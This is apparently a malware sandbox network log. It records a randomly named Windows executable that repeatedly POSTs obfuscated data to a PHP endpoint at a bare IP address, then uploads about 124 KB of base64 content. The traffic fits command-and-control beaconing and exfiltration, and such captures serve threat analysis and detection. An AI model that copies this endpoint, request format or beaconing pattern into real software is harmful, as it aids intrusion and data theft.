                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:41.640348911 CET2536OUTData Raw: 5d 52 43 54 58 5d 57 56 55 5e 55 5a 54 53 50 51 57 5d 5c 5a 52 55 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]RCTX]WVU^UZTSPQW]\ZRUQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .0U&*?2)\98'0R.9V /-\2!+(?>+>%!_.#Q,
                                                                                  Dec 21, 2024 10:02:42.665683985 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:42.900325060 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.54976789.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:43.161135912 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2532
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:43.515368938 CET2532OUTData Raw: 58 5e 43 55 5d 57 52 52 55 5e 55 5a 54 5b 50 57 57 52 5c 5c 52 54 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X^CU]WRRU^UZT[PWWR\\RTQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ @98R&*)6-?#'098#-Z2('+<[7*!_.#Q,.
                                                                                  Dec 21, 2024 10:02:44.546890020 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:44.780072927 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.54977489.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:45.313062906 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.54977889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:45.561671972 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:45.911245108 CET2112OUTData Raw: 58 5f 43 56 5d 56 52 57 55 5e 55 5a 54 52 50 51 57 53 5c 5a 52 52 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_CV]VRWU^UZTRPQWS\ZRRQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :2 R&-)29-/0',,;!R#/-Z%2*V+'>> ^*5!_.#Q,
                                                                                  Dec 21, 2024 10:02:46.941054106 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:47.242355108 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 1e 23 3b 03 1c 2b 39 3f 58 28 3f 0b 0e 29 3e 36 5c 2f 31 30 06 22 02 3e 5b 3e 03 23 5a 27 00 2f 59 36 29 35 59 21 06 20 00 3e 1b 2e 58 01 1e 21 06 23 0d 03 11 33 01 37 1e 2a 19 03 04 3c 00 2a 5d 24 01 24 09 24 2a 24 1b 3d 2a 28 1e 32 3d 07 03 2c 06 33 1d 3c 00 0e 57 33 36 2b 51 03 1e 26 5d 32 02 06 0a 26 23 22 01 25 07 39 5f 23 00 33 52 29 5e 28 0f 37 3b 35 07 2f 3a 20 16 3c 3e 21 02 2a 16 29 01 24 05 3f 52 25 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989#;+9?X(?)>6\/10">[>#Z'/Y6)5Y! >.X!#37*<*]$$$*$=*(2=,3<W36+Q&]2&#"%9_#3R)^(7;5/: <>!*)$?R%#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.54977989.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:46.147713900 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:46.499732971 CET2536OUTData Raw: 5d 55 46 57 5d 56 52 54 55 5e 55 5a 54 5f 50 5d 57 53 5c 5f 52 52 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]UFW]VRTU^UZT_P]WS\_RRQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .(S1=>*"59,3%/,,(=P ,92)?$4?(^>!_.#Q,6
                                                                                  Dec 21, 2024 10:02:47.524369955 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:47.764211893 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.54978589.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:48.053894997 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:48.407465935 CET2536OUTData Raw: 5d 55 43 56 58 5b 57 51 55 5e 55 5a 54 5f 50 51 57 5b 5c 5a 52 57 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]UCVX[WQU^UZT_PQW[\ZRWQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9<R1=-P*9\:?+0/:.4Y=\1*([<[8[)!_.#Q,6
                                                                                  Dec 21, 2024 10:02:49.437274933 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:49.672646046 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.54979189.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:49.941368103 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:50.296624899 CET2536OUTData Raw: 58 54 43 57 5d 5c 57 56 55 5e 55 5a 54 5e 50 5c 57 52 5c 5b 52 55 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XTCW]\WVU^UZT^P\WR\[RUQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#92$%=6>-?_$?(.;:7,>%2P?$7(_)!_.#Q,2
                                                                                  Dec 21, 2024 10:02:51.318923950 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:51.552298069 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.54979489.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:51.894328117 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:52.249752045 CET2536OUTData Raw: 58 53 43 52 58 5b 57 56 55 5e 55 5a 54 52 50 57 57 5a 5c 5f 52 50 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XSCRX[WVU^UZTRPWWZ\_RPQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:8$.9Q>&., $?,: &1?8?-,Z>5!_.#Q,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.54979889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:52.370276928 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2100
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:52.718543053 CET2100OUTData Raw: 5d 51 43 5f 58 5b 57 53 55 5e 55 5a 54 5b 50 52 57 5b 5c 58 52 56 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]QC_X[WSU^UZT[PRW[\XRVQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ B,11-W?!-/\0.R &!=+7>->!_.#Q,
                                                                                  Dec 21, 2024 10:02:53.746490002 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:53.980130911 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 3a 0b 37 15 3e 0b 29 29 37 12 2a 3c 39 0d 2a 58 22 5d 2e 32 30 06 22 12 29 03 3d 04 2b 5e 27 3d 27 5b 22 14 39 13 22 2f 30 03 3e 31 2e 58 01 1e 21 08 23 0d 35 55 24 06 3f 55 3d 09 2a 5b 2b 10 00 58 27 01 28 0e 25 5c 3c 59 3d 2a 2c 50 25 13 39 01 3b 11 0d 5e 3c 00 2c 54 24 26 2b 51 03 1e 25 05 26 05 3f 1e 26 0d 22 02 25 2e 22 01 22 2e 24 0e 29 3b 33 1a 23 15 3a 17 3b 17 20 15 28 3d 26 59 3d 06 3d 00 30 3f 37 55 32 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 98:7>))7*<9*X"].20")=+^'='["9"/0>1.X!#5U$?U=*[+X'(%\<Y=*,P%9;^<,T$&+Q%&?&"%."".$);3#:; (=&Y==0?7U2>#T-,H1]V0
                                                                                  Dec 21, 2024 10:02:53.980467081 CET426OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----B9co6awbhp0NMn6zd75TICxIjElnpRVpUq
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 124462
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:54.327996969 CET14832OUTData Raw: 2d 2d 2d 2d 2d 2d 42 39 63 6f 36 61 77 62 68 70 30 4e 4d 6e 36 7a 64 37 35 54 49 43 78 49 6a 45 6c 6e 70 52 56 70 55 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                  Data Ascii: ------B9co6awbhp0NMn6zd75TICxIjElnpRVpUqContent-Disposition: form-data; name="0"Content-Type: text/plainX_CSX]W^U^UZT_PRWX\TR_Q[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X
                                                                                  Dec 21, 2024 10:02:54.439095974 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:54.447727919 CET4944OUTData Raw: 64 7a 66 33 6d 5a 6f 36 66 45 48 54 42 58 54 69 47 52 2f 6a 62 52 76 45 56 4b 42 68 42 41 43 61 33 4c 5a 46 4f 49 61 31 51 46 6a 43 31 39 56 70 6e 71 6e 32 52 78 49 72 50 50 42 64 45 41 5a 6c 41 74 63 42 75 58 52 6a 65 7a 71 2b 33 31 42 69 56 5a
                                                                                  Data Ascii: dzf3mZo6fEHTBXTiGR/jbRvEVKBhBACa3LZFOIa1QFjC19Vpnqn2RxIrPPBdEAZlAtcBuXRjezq+31BiVZ32CIc4quulPJcC98HTBAbileI/xhtSnlUXFUIBSvEeOQ3gVd/KKRKAyI/lgUuv/erMcdPR23nfvLfY9mvk9+8yzx2xHyi3r0nwrJo0NjdKvszGiWzkHNzY+lPPmS39nL2lcNV7jN8RXA5dMmZWZY8WogIMLDY5diZ
                                                                                  Dec 21, 2024 10:02:54.447814941 CET2472OUTData Raw: 6d 77 6e 78 51 66 6a 48 71 72 52 76 53 6c 7a 31 52 55 63 6c 66 33 50 4a 74 74 78 35 78 31 74 68 39 46 55 47 69 50 55 47 47 4f 66 79 61 6b 73 2f 76 67 2f 4a 71 79 75 74 72 77 37 78 2f 53 72 31 49 54 75 71 4f 64 7a 59 50 66 78 4f 61 71 6c 47 32 6d
                                                                                  Data Ascii: mwnxQfjHqrRvSlz1RUclf3PJttx5x1th9FUGiPUGGOfyaks/vg/Jqyutrw7x/Sr1ITuqOdzYPfxOaqlG2mwqriGC+dTP2wuT/BUfPsR1BikepmJkQMdy2jfGKoYE0DeGYf/wkoDoyyRg+mH7fJDfQ4e/zqLFvNVxnIKx500ehYcj2BTQX53cGQ11BAj9mo87Sj+oTN0X3b2e5mbwyKNEnDUw50XBysWVgTfLv95f1DifVB4hv73
                                                                                  Dec 21, 2024 10:02:54.447879076 CET2472OUTData Raw: 56 34 57 32 42 72 50 54 4a 7a 6b 65 65 36 6d 62 6c 2b 74 72 2b 6f 37 55 38 77 33 34 55 31 4d 62 78 4c 51 7a 49 57 2b 6b 7a 7a 34 57 30 58 74 79 47 2f 71 69 74 65 79 65 64 72 65 77 65 63 55 34 5a 75 5a 47 7a 4e 56 38 69 63 71 48 49 6b 6c 58 34 68
                                                                                  Data Ascii: V4W2BrPTJzkee6mbl+tr+o7U8w34U1MbxLQzIW+kzz4W0XtyG/qiteyedrewecU4ZuZGzNV8icqHIklX4hIXf0aWbByG/07/3M1i1Ce1K5C3tBsz/hXiHdfEILoaMt2GX03uzuW71pYZ19mudLjIJbS8Kxf++LZa/u2xxXOVER09crpaMaXsWhGIyqrS7oBVi9KUm9k31q9gRbZZhb7fPRQfrQpY6i9mf5TUIha1buch+aJzKqL
                                                                                  Dec 21, 2024 10:02:54.447928905 CET2472OUTData Raw: 57 36 55 35 42 32 6f 4c 39 53 4a 57 66 4e 4c 66 4f 71 63 54 72 44 32 53 69 61 4a 35 2f 67 65 32 6f 6a 4f 43 55 32 74 66 31 62 33 33 4d 38 56 6c 4f 38 39 32 4f 41 37 36 54 4c 2f 43 67 77 51 73 6f 57 63 79 35 49 77 6d 41 31 39 6f 79 4c 59 49 67 76
                                                                                  Data Ascii: W6U5B2oL9SJWfNLfOqcTrD2SiaJ5/ge2ojOCU2tf1b33M8VlO892OA76TL/CgwQsoWcy5IwmA19oyLYIgvslL1Bz+FnNQAuVb39GaPBw4MslLdpaQg5BArKqRQNrq1LnrmBEDKSoDRz097uTgGE8pdHBQCQwF73GBOHUUFzXSaFvQbyMalvHr+rs9QWqUAvtt4i7oK7LHXCocBXAMXLctdxbjMwoGKSSKx/yMRsnIvn7OjlpD8v
                                                                                  Dec 21, 2024 10:02:54.447967052 CET2472OUTData Raw: 6b 38 48 70 52 2b 37 65 75 6d 64 62 6f 45 6f 57 72 77 51 32 2b 77 51 68 42 74 59 76 70 6d 6c 41 49 49 4f 54 30 65 73 38 68 45 52 61 55 46 41 6b 6a 42 78 68 71 4d 6c 46 4f 2f 49 77 4e 50 67 63 39 44 45 4a 62 4f 31 49 35 4f 43 34 61 52 61 44 78 6f
                                                                                  Data Ascii: k8HpR+7eumdboEoWrwQ2+wQhBtYvpmlAIIOT0es8hERaUFAkjBxhqMlFO/IwNPgc9DEJbO1I5OC4aRaDxoqeJs103SJzFnLLGtSZVOIzUAEk4KQhMH16iGE1A4NaSGdM3OcNgtE3we6rki35K1Vz2qLvl9PM9fXsVSJe88j6oItkNpsF4U953V+ZXzWFWaMSGyealAq+fdimyUeUpI7+TZCi7vBfgbaiaG7GZ+lg/9cEQm6ciwJ
                                                                                  Dec 21, 2024 10:02:54.448112965 CET7416OUTData Raw: 70 51 52 5a 6d 39 53 61 34 4c 74 54 68 4d 6a 52 78 79 67 35 64 6f 70 62 2b 72 31 39 55 4b 53 71 48 2f 31 6e 54 66 52 47 72 68 72 54 36 59 51 68 4d 61 75 4c 7a 59 68 31 67 52 65 44 4c 53 59 44 73 47 62 6b 78 54 66 6e 70 55 75 2f 39 2f 53 6c 4d 30
                                                                                  Data Ascii: pQRZm9Sa4LtThMjRxyg5dopb+r19UKSqH/1nTfRGrhrT6YQhMauLzYh1gReDLSYDsGbkxTfnpUu/9/SlM0wzaOy+IwIsY7Ly1/t2eYbmOEWLizyYF33sDNx2/MI/sFnyXTrRVnjkeZsloR7/o4qFFcnv9sOzbzDq6luMr0stX7n8dwrswwfDmQOJ/iM9+XmZetbtreyRIcvBRlwaqcsRN512iybsqwTwmsHGl1U47U8+DqK2Z+D
                                                                                  Dec 21, 2024 10:02:54.448154926 CET2472OUTData Raw: 55 6c 69 43 6a 30 6a 4a 6f 2f 61 47 75 59 4c 7a 6b 6c 50 34 62 41 58 70 33 2f 74 55 59 53 64 35 77 78 68 64 64 70 4a 37 69 73 39 38 6f 71 6e 56 2b 57 50 35 7a 6a 63 2b 5a 7a 6f 39 34 65 6b 64 47 6f 30 72 64 58 4f 74 41 78 65 47 67 2b 73 4b 37 35
                                                                                  Data Ascii: UliCj0jJo/aGuYLzklP4bAXp3/tUYSd5wxhddpJ7is98oqnV+WP5zjc+Zzo94ekdGo0rdXOtAxeGg+sK75XkqF9Qu84r5XS1Md4s4aeptSEqraBAzvCIkUOusTdJ4IW5hjkh4OcciBUHylMt2GNLleNKBwmtKGAq1wQCaP7NKR7nD3tQgugTCF+QVh2DHwis8P/2jSEXt9VcoORALErqwiNHVwTO8O+b0PBykAaSQj4rKd14Bdo
                                                                                  Dec 21, 2024 10:02:54.448242903 CET4944OUTData Raw: 41 48 55 78 74 71 49 6b 51 31 6a 6c 36 75 77 64 72 6c 62 54 50 42 72 50 54 68 6a 57 69 78 32 58 56 2f 52 32 64 4f 4c 4b 2f 49 38 56 47 2b 51 63 38 36 5a 66 65 67 50 54 62 66 50 30 61 78 35 4a 52 4f 42 58 6c 6b 5a 6b 32 2b 38 78 76 6e 72 4d 47 47
                                                                                  Data Ascii: AHUxtqIkQ1jl6uwdrlbTPBrPThjWix2XV/R2dOLK/I8VG+Qc86ZfegPTbfP0ax5JROBXlkZk2+8xvnrMGGH5m4FrAPrsvuiiaRw28p7GT8bvN4acL9DfdZztSPCSmuBx/9x8dDDIm38bzbL+3Xuz6ZlP/6Kee30ROquFTvXSM9rDTq8D0w4nKRFXlCuj6usqk2GtzaPod/mwRtvS56WGxjnmVfiHhx2Bn9r//BZT9ycwr+g8EO/
                                                                                  Dec 21, 2024 10:02:55.337810040 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
